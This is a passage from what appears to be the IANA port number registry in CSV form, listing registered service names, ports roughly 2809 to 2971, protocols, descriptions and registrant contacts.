LOC,[Ted_McFadden],[Ted_McFadden],,,,,, corbaloc,2809,udp,CORBA LOC,[Ted_McFadden],[Ted_McFadden],,,,,, netsteward,2810,tcp,Active Net Steward,[Keith_Morley],[Keith_Morley],,,,,, netsteward,2810,udp,Active Net Steward,[Keith_Morley],[Keith_Morley],,,,,, gsiftp,2811,tcp,GSI FTP,[Von_Welch],[Von_Welch],,,,,, gsiftp,2811,udp,GSI FTP,[Von_Welch],[Von_Welch],,,,,, atmtcp,2812,tcp,atmtcp,[Werner_Almesberger],[Werner_Almesberger],,,,,, atmtcp,2812,udp,atmtcp,[Werner_Almesberger],[Werner_Almesberger],,,,,, llm-pass,2813,tcp,llm-pass,,,,,,,, llm-pass,2813,udp,llm-pass,,,,,,,, llm-csv,2814,tcp,llm-csv,[Glen_Sansoucie_2],[Glen_Sansoucie_2],,,,,, llm-csv,2814,udp,llm-csv,[Glen_Sansoucie_2],[Glen_Sansoucie_2],,,,,, lbc-measure,2815,tcp,LBC Measurement,,,,,,,, lbc-measure,2815,udp,LBC Measurement,,,,,,,, lbc-watchdog,2816,tcp,LBC Watchdog,[Akiyoshi_Ochi],[Akiyoshi_Ochi],,,,,, lbc-watchdog,2816,udp,LBC Watchdog,[Akiyoshi_Ochi],[Akiyoshi_Ochi],,,,,, nmsigport,2817,tcp,NMSig Port,[Peter_Egli_2],[Peter_Egli_2],,,,,, nmsigport,2817,udp,NMSig Port,[Peter_Egli_2],[Peter_Egli_2],,,,,, rmlnk,2818,tcp,rmlnk,,,,,,,, rmlnk,2818,udp,rmlnk,,,,,,,, fc-faultnotify,2819,tcp,FC Fault Notification,[Dave_Watkins],[Dave_Watkins],,,,,, fc-faultnotify,2819,udp,FC Fault Notification,[Dave_Watkins],[Dave_Watkins],,,,,, univision,2820,tcp,UniVision,[Keith_Ansell],[Keith_Ansell],,,,,, univision,2820,udp,UniVision,[Keith_Ansell],[Keith_Ansell],,,,,, vrts-at-port,2821,tcp,VERITAS Authentication Service,[Stefan_Winkel],[Stefan_Winkel],,,,,, vrts-at-port,2821,udp,VERITAS Authentication Service,[Stefan_Winkel],[Stefan_Winkel],,,,,, ka0wuc,2822,tcp,ka0wuc,[Kit_Haskins],[Kit_Haskins],,,,,, ka0wuc,2822,udp,ka0wuc,[Kit_Haskins],[Kit_Haskins],,,,,, cqg-netlan,2823,tcp,CQG Net/LAN,,,,,,,, cqg-netlan,2823,udp,CQG Net/LAN,,,,,,,, cqg-netlan-1,2824,tcp,CQG Net/LAN 1,[Jeff_Wood],[Jeff_Wood],,,,,, cqg-netlan-1,2824,udp,CQG Net/Lan 1,[Jeff_Wood],[Jeff_Wood],,,,,, ,2825,,(unassigned) Possibly assigned,,,,,,,, slc-systemlog,2826,tcp,slc systemlog,,,,,,,, slc-systemlog,2826,udp,slc systemlog,,,,,,,, slc-ctrlrloops,2827,tcp,slc ctrlrloops,[Erwin_Hogeweg],[Erwin_Hogeweg],,,,,, slc-ctrlrloops,2827,udp,slc ctrlrloops,[Erwin_Hogeweg],[Erwin_Hogeweg],,,,,, itm-lm,2828,tcp,ITM License Manager,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, itm-lm,2828,udp,ITM License Manager,[Portnoy_Boxman],[Portnoy_Boxman],,,,,, silkp1,2829,tcp,silkp1,,,,,,,, silkp1,2829,udp,silkp1,,,,,,,, silkp2,2830,tcp,silkp2,,,,,,,, silkp2,2830,udp,silkp2,,,,,,,, silkp3,2831,tcp,silkp3,,,,,,,, silkp3,2831,udp,silkp3,,,,,,,, silkp4,2832,tcp,silkp4,[Erik_Skyten],[Erik_Skyten],,,,,, silkp4,2832,udp,silkp4,[Erik_Skyten],[Erik_Skyten],,,,,, glishd,2833,tcp,glishd,[Darrell_Schiebel],[Darrell_Schiebel],,,,,, glishd,2833,udp,glishd,[Darrell_Schiebel],[Darrell_Schiebel],,,,,, evtp,2834,tcp,EVTP,,,,,,,, evtp,2834,udp,EVTP,,,,,,,, evtp-data,2835,tcp,EVTP-DATA,[Eric_Bruno],[Eric_Bruno],,,,,, evtp-data,2835,udp,EVTP-DATA,[Eric_Bruno],[Eric_Bruno],,,,,, catalyst,2836,tcp,catalyst,[Garret_Tollkuhn],[Garret_Tollkuhn],,,,,, catalyst,2836,udp,catalyst,[Garret_Tollkuhn],[Garret_Tollkuhn],,,,,, repliweb,2837,tcp,Repliweb,[William_Orme],[William_Orme],,,,,, repliweb,2837,udp,Repliweb,[William_Orme],[William_Orme],,,,,, starbot,2838,tcp,Starbot,[Markus_Sabadello_2],[Markus_Sabadello_2],,,,,, starbot,2838,udp,Starbot,[Markus_Sabadello_2],[Markus_Sabadello_2],,,,,, nmsigport,2839,tcp,NMSigPort,[Peter_Egli_2],[Peter_Egli_2],,,,,, nmsigport,2839,udp,NMSigPort,[Peter_Egli_2],[Peter_Egli_2],,,,,, l3-exprt,2840,tcp,l3-exprt,,,,,,,, l3-exprt,2840,udp,l3-exprt,,,,,,,, l3-ranger,2841,tcp,l3-ranger,,,,,,,, l3-ranger,2841,udp,l3-ranger,,,,,,,, l3-hawk,2842,tcp,l3-hawk,[Dolores_Scott_2],[Dolores_Scott_2],,,,,, l3-hawk,2842,udp,l3-hawk,[Dolores_Scott_2],[Dolores_Scott_2],,,,,, pdnet,2843,tcp,PDnet,[Torsten_Scheffler],[Torsten_Scheffler],,,,,, pdnet,2843,udp,PDnet,[Torsten_Scheffler],[Torsten_Scheffler],,,,,, bpcp-poll,2844,tcp,BPCP POLL,,,,,,,, bpcp-poll,2844,udp,BPCP POLL,,,,,,,, bpcp-trap,2845,tcp,BPCP TRAP,[Steve_Van_Duser],[Steve_Van_Duser],,,,,, bpcp-trap,2845,udp,BPCP TRAP,[Steve_Van_Duser],[Steve_Van_Duser],,,,,, aimpp-hello,2846,tcp,AIMPP Hello,,,,,,,, aimpp-hello,2846,udp,AIMPP Hello,,,,,,,, aimpp-port-req,2847,tcp,AIMPP Port Req,[Brian_Martinicky],[Brian_Martinicky],,,,,, aimpp-port-req,2847,udp,AIMPP Port Req,[Brian_Martinicky],[Brian_Martinicky],,,,,, amt-blc-port,2848,tcp,AMT-BLC-PORT,[Sandra_Frulloni],[Sandra_Frulloni],,,,,, amt-blc-port,2848,udp,AMT-BLC-PORT,[Sandra_Frulloni],[Sandra_Frulloni],,,,,, fxp,2849,tcp,FXP,[Martin_Lichtin],[Martin_Lichtin],,,,,, fxp,2849,udp,FXP,[Martin_Lichtin],[Martin_Lichtin],,,,,, metaconsole,2850,tcp,MetaConsole,[Rakesh_Mahajan],[Rakesh_Mahajan],,,,,, metaconsole,2850,udp,MetaConsole,[Rakesh_Mahajan],[Rakesh_Mahajan],,,,,, webemshttp,2851,tcp,webemshttp,[Stephen_Tsun],[Stephen_Tsun],,,,,, webemshttp,2851,udp,webemshttp,[Stephen_Tsun],[Stephen_Tsun],,,,,, bears-01,2852,tcp,bears-01,[Bruce_McKinnon],[Bruce_McKinnon],,,,,, bears-01,2852,udp,bears-01,[Bruce_McKinnon],[Bruce_McKinnon],,,,,, ispipes,2853,tcp,ISPipes,[Rajesh_Nandyalam],[Rajesh_Nandyalam],,,,,, ispipes,2853,udp,ISPipes,[Rajesh_Nandyalam],[Rajesh_Nandyalam],,,,,, infomover,2854,tcp,InfoMover,[Carla_Caputo],[Carla_Caputo],,,,,, infomover,2854,udp,InfoMover,[Carla_Caputo],[Carla_Caputo],,,,,, msrp,2855,tcp,MSRP over TCP,,,,2014-04-09,[RFC4976],,, ,2855,udp,Reserved,,,,2014-04-09,,,, cesdinv,2856,tcp,cesdinv,[Yoshiaki_Tokumoto],[Yoshiaki_Tokumoto],,,,,, cesdinv,2856,udp,cesdinv,[Yoshiaki_Tokumoto],[Yoshiaki_Tokumoto],,,,,, simctlp,2857,tcp,SimCtIP,[Christian_Zietz],[Christian_Zietz],,,,,, simctlp,2857,udp,SimCtIP,[Christian_Zietz],[Christian_Zietz],,,,,, ecnp,2858,tcp,ECNP,[Robert_Reimiller],[Robert_Reimiller],,,,,, ecnp,2858,udp,ECNP,[Robert_Reimiller],[Robert_Reimiller],,,,,, activememory,2859,tcp,Active Memory,[Joe_Graham],[Joe_Graham],,,,,, activememory,2859,udp,Active Memory,[Joe_Graham],[Joe_Graham],,,,,, dialpad-voice1,2860,tcp,Dialpad Voice 1,,,,,,,, dialpad-voice1,2860,udp,Dialpad Voice 1,,,,,,,, dialpad-voice2,2861,tcp,Dialpad Voice 2,[Wongyu_Cho],[Wongyu_Cho],,,,,, dialpad-voice2,2861,udp,Dialpad Voice 2,[Wongyu_Cho],[Wongyu_Cho],,,,,, ttg-protocol,2862,tcp,TTG Protocol,[Mark_Boler],[Mark_Boler],,,,,, ttg-protocol,2862,udp,TTG Protocol,[Mark_Boler],[Mark_Boler],,,,,, sonardata,2863,tcp,Sonar Data,[Ian_Higginbottom],[Ian_Higginbottom],,,,,, sonardata,2863,udp,Sonar Data,[Ian_Higginbottom],[Ian_Higginbottom],,,,,, astromed-main,2864,tcp,main 5001 cmd,[Chris_Tate],[Chris_Tate],,,,,, astromed-main,2864,udp,main 5001 cmd,[Chris_Tate],[Chris_Tate],,,,,, pit-vpn,2865,tcp,pit-vpn,[Norbert_Sendetzky],[Norbert_Sendetzky],,,,,, pit-vpn,2865,udp,pit-vpn,[Norbert_Sendetzky],[Norbert_Sendetzky],,,,,, iwlistener,2866,tcp,iwlistener,[Fred_Surr],[Fred_Surr],,,,,, iwlistener,2866,udp,iwlistener,[Fred_Surr],[Fred_Surr],,,,,, esps-portal,2867,tcp,esps-portal,[Nicholas_Stowfis],[Nicholas_Stowfis],,,,,, esps-portal,2867,udp,esps-portal,[Nicholas_Stowfis],[Nicholas_Stowfis],,,,,, npep-messaging,2868,tcp,Norman Proprietaqry Events Protocol,[Norman_Safeground_AS],[Kristian_A_Bognaes],,2014-01-15,,,, npep-messaging,2868,udp,Norman Proprietaqry Events Protocol,[Norman_Safeground_AS],[Kristian_A_Bognaes],,2014-01-15,,,, icslap,2869,tcp,ICSLAP,[Richard_Lamb],[Richard_Lamb],,,,,, icslap,2869,udp,ICSLAP,[Richard_Lamb],[Richard_Lamb],,,,,, daishi,2870,tcp,daishi,[Patrick_Chipman],[Patrick_Chipman],,,,,, daishi,2870,udp,daishi,[Patrick_Chipman],[Patrick_Chipman],,,,,, msi-selectplay,2871,tcp,MSI Select Play,[Paul_Fonte],[Paul_Fonte],,,,,, msi-selectplay,2871,udp,MSI Select Play,[Paul_Fonte],[Paul_Fonte],,,,,, radix,2872,tcp,RADIX,[Stein_Roger_Skaflott],[Stein_Roger_Skaflott],,2011-07-06,,,, radix,2872,udp,RADIX,[Stein_Roger_Skaflott],[Stein_Roger_Skaflott],,2011-07-06,,,, ,2873,,Unassigned,,,,2003-07-23,,,, dxmessagebase1,2874,tcp,DX Message Base Transport Protocol,,,,,,,, dxmessagebase1,2874,udp,DX Message Base Transport Protocol,,,,,,,, dxmessagebase2,2875,tcp,DX Message Base Transport Protocol,[G_E_Ozz_Nixon_Jr],[G_E_Ozz_Nixon_Jr],2009-01-13,,,,, dxmessagebase2,2875,udp,DX Message Base Transport Protocol,[G_E_Ozz_Nixon_Jr],[G_E_Ozz_Nixon_Jr],2009-01-13,,,,, sps-tunnel,2876,tcp,SPS Tunnel,[Bill_McIntosh],[Bill_McIntosh],,,,,, sps-tunnel,2876,udp,SPS Tunnel,[Bill_McIntosh],[Bill_McIntosh],,,,,, bluelance,2877,tcp,BLUELANCE,[Michael_Padrezas],[Michael_Padrezas],,,,,, bluelance,2877,udp,BLUELANCE,[Michael_Padrezas],[Michael_Padrezas],,,,,, aap,2878,tcp,AAP,[Stephen_Hanna_2],[Stephen_Hanna_2],,,,,, aap,2878,udp,AAP,[Stephen_Hanna_2],[Stephen_Hanna_2],,,,,, ucentric-ds,2879,tcp,ucentric-ds,[Alex_Vasilevsky],[Alex_Vasilevsky],,,,,, ucentric-ds,2879,udp,ucentric-ds,[Alex_Vasilevsky],[Alex_Vasilevsky],,,,,, synapse,2880,tcp,Synapse Transport,[Ali_Fracyon],[Ali_Fracyon],,,,,, synapse,2880,udp,Synapse Transport,[Ali_Fracyon],[Ali_Fracyon],,,,,, ndsp,2881,tcp,NDSP,,,,,,,, ndsp,2881,udp,NDSP,,,,,,,, ndtp,2882,tcp,NDTP,,,,,,,, ndtp,2882,udp,NDTP,,,,,,,, ndnp,2883,tcp,NDNP,[Khelben_Blackstaff],[Khelben_Blackstaff],,,,,, ndnp,2883,udp,NDNP,[Khelben_Blackstaff],[Khelben_Blackstaff],,,,,, flashmsg,2884,tcp,Flash Msg,[Jeffrey_Zinkerman],[Jeffrey_Zinkerman],,,,,, flashmsg,2884,udp,Flash Msg,[Jeffrey_Zinkerman],[Jeffrey_Zinkerman],,,,,, topflow,2885,tcp,TopFlow,[Ted_Ross],[Ted_Ross],,,,,, topflow,2885,udp,TopFlow,[Ted_Ross],[Ted_Ross],,,,,, responselogic,2886,tcp,RESPONSELOGIC,[Bruce_Casey],[Bruce_Casey],,,,,, responselogic,2886,udp,RESPONSELOGIC,[Bruce_Casey],[Bruce_Casey],,,,,, aironetddp,2887,tcp,aironet,[Victor_Griswold],[Victor_Griswold],,,,,, aironetddp,2887,udp,aironet,[Victor_Griswold],[Victor_Griswold],,,,,, spcsdlobby,2888,tcp,SPCSDLOBBY,[Matthew_Williams],[Matthew_Williams],,,,,, spcsdlobby,2888,udp,SPCSDLOBBY,[Matthew_Williams],[Matthew_Williams],,,,,, rsom,2889,tcp,RSOM,[Justine_Higgins],[Justine_Higgins],,,,,, rsom,2889,udp,RSOM,[Justine_Higgins],[Justine_Higgins],,,,,, cspclmulti,2890,tcp,CSPCLMULTI,[Yoneda_Terumasa],[Yoneda_Terumasa],,,,,, cspclmulti,2890,udp,CSPCLMULTI,[Yoneda_Terumasa],[Yoneda_Terumasa],,,,,, cinegrfx-elmd,2891,tcp,CINEGRFX-ELMD License Manager,[Greg_Ercolano_2],[Greg_Ercolano_2],,,,,, cinegrfx-elmd,2891,udp,CINEGRFX-ELMD License Manager,[Greg_Ercolano_2],[Greg_Ercolano_2],,,,,, snifferdata,2892,tcp,SNIFFERDATA,[Jeff_Mangasarian],[Jeff_Mangasarian],,,,,, snifferdata,2892,udp,SNIFFERDATA,[Jeff_Mangasarian],[Jeff_Mangasarian],,,,,, vseconnector,2893,tcp,VSECONNECTOR,[Ingo_Franzki],[Ingo_Franzki],,,,,, vseconnector,2893,udp,VSECONNECTOR,[Ingo_Franzki],[Ingo_Franzki],,,,,, abacus-remote,2894,tcp,ABACUS-REMOTE,[Mike_Bello],[Mike_Bello],,,,,, abacus-remote,2894,udp,ABACUS-REMOTE,[Mike_Bello],[Mike_Bello],,,,,, natuslink,2895,tcp,NATUS LINK,[Jonathan_Mergy],[Jonathan_Mergy],,,,,, natuslink,2895,udp,NATUS LINK,[Jonathan_Mergy],[Jonathan_Mergy],,,,,, ecovisiong6-1,2896,tcp,ECOVISIONG6-1,[Henrik_Holst],[Henrik_Holst],,,,,, ecovisiong6-1,2896,udp,ECOVISIONG6-1,[Henrik_Holst],[Henrik_Holst],,,,,, citrix-rtmp,2897,tcp,Citrix RTMP,[Myk_Willis],[Myk_Willis],,,,,, citrix-rtmp,2897,udp,Citrix RTMP,[Myk_Willis],[Myk_Willis],,,,,, appliance-cfg,2898,tcp,APPLIANCE-CFG,[Gary_A_James],[Gary_A_James],,,,,, appliance-cfg,2898,udp,APPLIANCE-CFG,[Gary_A_James],[Gary_A_James],,,,,, powergemplus,2899,tcp,POWERGEMPLUS,[Koich_Nakamura],[Koich_Nakamura],,,,,, powergemplus,2899,udp,POWERGEMPLUS,[Koich_Nakamura],[Koich_Nakamura],,,,,, quicksuite,2900,tcp,QUICKSUITE,[William_Egge],[William_Egge],,,,,, quicksuite,2900,udp,QUICKSUITE,[William_Egge],[William_Egge],,,,,, allstorcns,2901,tcp,ALLSTORCNS,[Steve_Dobson],[Steve_Dobson],,,,,, allstorcns,2901,udp,ALLSTORCNS,[Steve_Dobson],[Steve_Dobson],,,,,, netaspi,2902,tcp,NET ASPI,[Johnson_Luo],[Johnson_Luo],,,,,, netaspi,2902,udp,NET ASPI,[Johnson_Luo],[Johnson_Luo],,,,,, suitcase,2903,tcp,SUITCASE,[Milton_E_Sagen],[Milton_E_Sagen],,,,,, suitcase,2903,udp,SUITCASE,[Milton_E_Sagen],[Milton_E_Sagen],,,,,, m2ua,2904,tcp,M2UA,[Lyndon_Ong],[Lyndon_Ong],,,,,, m2ua,2904,udp,M2UA,[Lyndon_Ong],[Lyndon_Ong],,,,,, m2ua,2904,sctp,M2UA,[Lyndon_Ong],[Lyndon_Ong],,,,,, m3ua,2905,tcp,M3UA,[Lyndon_Ong],[Lyndon_Ong],,,[RFC4666],,, ,2905,udp,De-registered,,,2001-06-07,,,,, m3ua,2905,sctp,M3UA,[Lyndon_Ong],[Lyndon_Ong],,,[RFC4666],,, caller9,2906,tcp,CALLER9,[Shams_Naqi],[Shams_Naqi],,,,,, caller9,2906,udp,CALLER9,[Shams_Naqi],[Shams_Naqi],,,,,, webmethods-b2b,2907,tcp,WEBMETHODS B2B,[Joseph_Hines],[Joseph_Hines],,,,,, webmethods-b2b,2907,udp,WEBMETHODS B2B,[Joseph_Hines],[Joseph_Hines],,,,,, mao,2908,tcp,mao,[Marc_Baudoin],[Marc_Baudoin],,,,,, mao,2908,udp,mao,[Marc_Baudoin],[Marc_Baudoin],,,,,, funk-dialout,2909,tcp,Funk Dialout,[Cimarron_Boozer],[Cimarron_Boozer],,,,,, funk-dialout,2909,udp,Funk Dialout,[Cimarron_Boozer],[Cimarron_Boozer],,,,,, tdaccess,2910,tcp,TDAccess,[Tom_Haapanen],[Tom_Haapanen],,,,,, tdaccess,2910,udp,TDAccess,[Tom_Haapanen],[Tom_Haapanen],,,,,, blockade,2911,tcp,Blockade,[Blockade],[Blockade],,,,,, blockade,2911,udp,Blockade,[Blockade],[Blockade],,,,,, epicon,2912,tcp,Epicon,[Michael_Khalandovsky],[Michael_Khalandovsky],,,,,, epicon,2912,udp,Epicon,[Michael_Khalandovsky],[Michael_Khalandovsky],,,,,, boosterware,2913,tcp,Booster Ware,[Ido_Ben_David],[Ido_Ben_David],,,,,, boosterware,2913,udp,Booster Ware,[Ido_Ben_David],[Ido_Ben_David],,,,,, gamelobby,2914,tcp,Game Lobby,[Paul_Ford_Hutchinson],[Paul_Ford_Hutchinson],,,,,, gamelobby,2914,udp,Game Lobby,[Paul_Ford_Hutchinson],[Paul_Ford_Hutchinson],,,,,, tksocket,2915,tcp,TK Socket,[Dino_Ciano],[Dino_Ciano],2011-03-02,,,,, tksocket,2915,udp,TK Socket,[Dino_Ciano],[Dino_Ciano],2011-03-02,,,,, elvin-server,2916,tcp,"Elvin Server IANA assigned this well-formed service name as a replacement for ""elvin_server"".",,,,,,,, elvin_server,2916,tcp,Elvin Server,,,,,,,,"This entry is an alias to ""elvin-server"". This entry is now historic, not usable for use with many common service discovery mechanisms." elvin-server,2916,udp,"Elvin Server IANA assigned this well-formed service name as a replacement for ""elvin_server"".",,,,,,,, elvin_server,2916,udp,Elvin Server,,,,,,,,"This entry is an alias to ""elvin-server"". This entry is now historic, not usable for use with many common service discovery mechanisms." elvin-client,2917,tcp,"Elvin Client IANA assigned this well-formed service name as a replacement for ""elvin_client"".",[David_Arnold],[David_Arnold],,,,,, elvin_client,2917,tcp,Elvin Client,[David_Arnold],[David_Arnold],,,,,,"This entry is an alias to ""elvin-client"". This entry is now historic, not usable for use with many common service discovery mechanisms." elvin-client,2917,udp,"Elvin Client IANA assigned this well-formed service name as a replacement for ""elvin_client"".",[David_Arnold],[David_Arnold],,,,,, elvin_client,2917,udp,Elvin Client,[David_Arnold],[David_Arnold],,,,,,"This entry is an alias to ""elvin-client"". This entry is now historic, not usable for use with many common service discovery mechanisms." kastenchasepad,2918,tcp,Kasten Chase Pad,[Marc_Gauthier],[Marc_Gauthier],,,,,, kastenchasepad,2918,udp,Kasten Chase Pad,[Marc_Gauthier],[Marc_Gauthier],,,,,, roboer,2919,tcp,roboER,[Paul_Snook],[Paul_Snook],,,,,, roboer,2919,udp,roboER,[Paul_Snook],[Paul_Snook],,,,,, roboeda,2920,tcp,roboEDA,[Paul_Snook],[Paul_Snook],,,,,, roboeda,2920,udp,roboEDA,[Paul_Snook],[Paul_Snook],,,,,, cesdcdman,2921,tcp,CESD Contents Delivery Management,[Shinya_Abe],[Shinya_Abe],,,,,, cesdcdman,2921,udp,CESD Contents Delivery Management,[Shinya_Abe],[Shinya_Abe],,,,,, cesdcdtrn,2922,tcp,CESD Contents Delivery Data Transfer,[Shinya_Abe],[Shinya_Abe],,,,,, cesdcdtrn,2922,udp,CESD Contents Delivery Data Transfer,[Shinya_Abe],[Shinya_Abe],,,,,, wta-wsp-wtp-s,2923,tcp,WTA-WSP-WTP-S,[Sebastien_Bury],[Sebastien_Bury],,,,,, wta-wsp-wtp-s,2923,udp,WTA-WSP-WTP-S,[Sebastien_Bury],[Sebastien_Bury],,,,,, precise-vip,2924,tcp,PRECISE-VIP,[Michael_Landwehr],[Michael_Landwehr],,,,,, precise-vip,2924,udp,PRECISE-VIP,[Michael_Landwehr],[Michael_Landwehr],,,,,, ,2925,,Unassigned (FRP-Released 12/7/00),,,,,,,, mobile-file-dl,2926,tcp,MOBILE-FILE-DL,[Mitsuji_Toda],[Mitsuji_Toda],,,,,, mobile-file-dl,2926,udp,MOBILE-FILE-DL,[Mitsuji_Toda],[Mitsuji_Toda],,,,,, unimobilectrl,2927,tcp,UNIMOBILECTRL,[Vikas],[Vikas],,,,,, unimobilectrl,2927,udp,UNIMOBILECTRL,[Vikas],[Vikas],,,,,, redstone-cpss,2928,tcp,REDSTONE-CPSS,[Jeff_Looman],[Jeff_Looman],,,,,, redstone-cpss,2928,udp,REDSTONE-CPSS,[Jeff_Looman],[Jeff_Looman],,,,,, amx-webadmin,2929,tcp,AMX-WEBADMIN,[Mike_Morris],[Mike_Morris],,,,,, amx-webadmin,2929,udp,AMX-WEBADMIN,[Mike_Morris],[Mike_Morris],,,,,, amx-weblinx,2930,tcp,AMX-WEBLINX,[Mike_Morris],[Mike_Morris],,,,,, amx-weblinx,2930,udp,AMX-WEBLINX,[Mike_Morris],[Mike_Morris],,,,,, circle-x,2931,tcp,Circle-X,[Norm_Freedman_2],[Norm_Freedman_2],,,,,, circle-x,2931,udp,Circle-X,[Norm_Freedman_2],[Norm_Freedman_2],,,,,, incp,2932,tcp,INCP,[Keith_Paulsen],[Keith_Paulsen],,,,,, incp,2932,udp,INCP,[Keith_Paulsen],[Keith_Paulsen],,,,,, 4-tieropmgw,2933,tcp,4-TIER OPM GW,[Francois_Peloffy],[Francois_Peloffy],,,,,, 4-tieropmgw,2933,udp,4-TIER OPM GW,[Francois_Peloffy],[Francois_Peloffy],,,,,, 4-tieropmcli,2934,tcp,4-TIER OPM CLI,[Francois_Peloffy],[Francois_Peloffy],,,,,, 4-tieropmcli,2934,udp,4-TIER OPM CLI,[Francois_Peloffy],[Francois_Peloffy],,,,,, qtp,2935,tcp,QTP,[Cameron_Young],[Cameron_Young],,,,,, qtp,2935,udp,QTP,[Cameron_Young],[Cameron_Young],,,,,, otpatch,2936,tcp,OTPatch,[Brett_Goldstein],[Brett_Goldstein],,,,,, otpatch,2936,udp,OTPatch,[Brett_Goldstein],[Brett_Goldstein],,,,,, pnaconsult-lm,2937,tcp,PNACONSULT-LM,[Theo_Nijssen],[Theo_Nijssen],,,,,, pnaconsult-lm,2937,udp,PNACONSULT-LM,[Theo_Nijssen],[Theo_Nijssen],,,,,, sm-pas-1,2938,tcp,SM-PAS-1,,,,,,,, sm-pas-1,2938,udp,SM-PAS-1,,,,,,,, sm-pas-2,2939,tcp,SM-PAS-2,,,,,,,, sm-pas-2,2939,udp,SM-PAS-2,,,,,,,, sm-pas-3,2940,tcp,SM-PAS-3,,,,,,,, sm-pas-3,2940,udp,SM-PAS-3,,,,,,,, sm-pas-4,2941,tcp,SM-PAS-4,,,,,,,, sm-pas-4,2941,udp,SM-PAS-4,,,,,,,, sm-pas-5,2942,tcp,SM-PAS-5,[Tom_Haapanen],[Tom_Haapanen],,,,,, sm-pas-5,2942,udp,SM-PAS-5,[Tom_Haapanen],[Tom_Haapanen],,,,,, ttnrepository,2943,tcp,TTNRepository,[Robert_Orr],[Robert_Orr],,,,,, ttnrepository,2943,udp,TTNRepository,[Robert_Orr],[Robert_Orr],,,,,, megaco-h248,2944,tcp,Megaco H-248,[Tom_Taylor_2],[Tom_Taylor_2],,,,,, megaco-h248,2944,udp,Megaco H-248,[Tom_Taylor_2],[Tom_Taylor_2],,,,,, megaco-h248,2944,sctp,Megaco-H.248 text,[Tom_Taylor_3],[Tom_Taylor_3],2006-09,,,,, h248-binary,2945,tcp,H248 Binary,[Tom_Taylor_2],[Tom_Taylor_2],,,,,, h248-binary,2945,udp,H248 Binary,[Tom_Taylor_2],[Tom_Taylor_2],,,,,, h248-binary,2945,sctp,Megaco/H.248 binary,[Tom_Taylor_3],[Tom_Taylor_3],2006-09,,,,, fjsvmpor,2946,tcp,FJSVmpor,[Naoki_Hayashi],[Naoki_Hayashi],,,,,, fjsvmpor,2946,udp,FJSVmpor,[Naoki_Hayashi],[Naoki_Hayashi],,,,,, gpsd,2947,tcp,GPS Daemon request/response protocol,[Eric_S_Raymond],[Eric_S_Raymond],,2010-04-19,,,, gpsd,2947,udp,GPS Daemon request/response protocol,[Eric_S_Raymond],[Eric_S_Raymond],,2010-04-19,,,, wap-push,2948,tcp,WAP PUSH,,,,,,,, wap-push,2948,udp,WAP PUSH,,,,,,,, wap-pushsecure,2949,tcp,WAP PUSH SECURE,[WAP_Forum],[WAP_Forum],,,,,, wap-pushsecure,2949,udp,WAP PUSH SECURE,[WAP_Forum],[WAP_Forum],,,,,, esip,2950,tcp,ESIP,[David_Stephenson],[David_Stephenson],,,,,, esip,2950,udp,ESIP,[David_Stephenson],[David_Stephenson],,,,,, ottp,2951,tcp,OTTP,[Brent_Foster],[Brent_Foster],,,,,, ottp,2951,udp,OTTP,[Brent_Foster],[Brent_Foster],,,,,, mpfwsas,2952,tcp,MPFWSAS,[Toru_Murai],[Toru_Murai],,,,,, mpfwsas,2952,udp,MPFWSAS,[Toru_Murai],[Toru_Murai],,,,,, ovalarmsrv,2953,tcp,OVALARMSRV,,,,,,,, ovalarmsrv,2953,udp,OVALARMSRV,,,,,,,, ovalarmsrv-cmd,2954,tcp,OVALARMSRV-CMD,[Eric_Pulsipher],[Eric_Pulsipher],,,,,, ovalarmsrv-cmd,2954,udp,OVALARMSRV-CMD,[Eric_Pulsipher],[Eric_Pulsipher],,,,,, csnotify,2955,tcp,CSNOTIFY,[Israel_Beniaminy],[Israel_Beniaminy],,,,,, csnotify,2955,udp,CSNOTIFY,[Israel_Beniaminy],[Israel_Beniaminy],,,,,, ovrimosdbman,2956,tcp,OVRIMOSDBMAN,[Dimitrios_Souflis],[Dimitrios_Souflis],,,,,, ovrimosdbman,2956,udp,OVRIMOSDBMAN,[Dimitrios_Souflis],[Dimitrios_Souflis],,,,,, jmact5,2957,tcp,JAMCT5,,,,,,,, jmact5,2957,udp,JAMCT5,,,,,,,, jmact6,2958,tcp,JAMCT6,,,,,,,, jmact6,2958,udp,JAMCT6,,,,,,,, rmopagt,2959,tcp,RMOPAGT,[Shuji_Okubo],[Shuji_Okubo],,,,,, rmopagt,2959,udp,RMOPAGT,[Shuji_Okubo],[Shuji_Okubo],,,,,, dfoxserver,2960,tcp,DFOXSERVER,[David_Holden],[David_Holden],,,,,, dfoxserver,2960,udp,DFOXSERVER,[David_Holden],[David_Holden],,,,,, boldsoft-lm,2961,tcp,BOLDSOFT-LM,[Fredrik_Haglund],[Fredrik_Haglund],,,,,, boldsoft-lm,2961,udp,BOLDSOFT-LM,[Fredrik_Haglund],[Fredrik_Haglund],,,,,, iph-policy-cli,2962,tcp,IPH-POLICY-CLI,,,,,,,, iph-policy-cli,2962,udp,IPH-POLICY-CLI,,,,,,,, iph-policy-adm,2963,tcp,IPH-POLICY-ADM,[Shai_Herzog],[Shai_Herzog],,,,,, iph-policy-adm,2963,udp,IPH-POLICY-ADM,[Shai_Herzog],[Shai_Herzog],,,,,, bullant-srap,2964,tcp,BULLANT SRAP,,,,,,,, bullant-srap,2964,udp,BULLANT SRAP,,,,,,,, bullant-rap,2965,tcp,BULLANT RAP,[Michael_Cahill],[Michael_Cahill],,,,,, bullant-rap,2965,udp,BULLANT RAP,[Michael_Cahill],[Michael_Cahill],,,,,, idp-infotrieve,2966,tcp,IDP-INFOTRIEVE,[Kevin_Bruckert],[Kevin_Bruckert],,,,,, idp-infotrieve,2966,udp,IDP-INFOTRIEVE,[Kevin_Bruckert],[Kevin_Bruckert],,,,,, ssc-agent,2967,tcp,SSC-AGENT,[George_Dzieciol],[George_Dzieciol],,,,,, ssc-agent,2967,udp,SSC-AGENT,[George_Dzieciol],[George_Dzieciol],,,,,, enpp,2968,tcp,ENPP,[Kazuhito_Gassho],[Kazuhito_Gassho],,,,,, enpp,2968,udp,ENPP,[Kazuhito_Gassho],[Kazuhito_Gassho],,,,,, essp,2969,tcp,ESSP,[Hitoshi_Ishida],[Hitoshi_Ishida],,,,,, essp,2969,udp,ESSP,[Hitoshi_Ishida],[Hitoshi_Ishida],,,,,, index-net,2970,tcp,INDEX-NET,[Chris_J_Wren],[Chris_J_Wren],,,,,, index-net,2970,udp,INDEX-NET,[Chris_J_Wren],[Chris_J_Wren],,,,,, netclip,2971,tcp,NetClip clipboard daemon,[Rudi_Chiarito],[Rudi_Chiarito],,,,,, netclip,2971,udp,NetClip clipboard 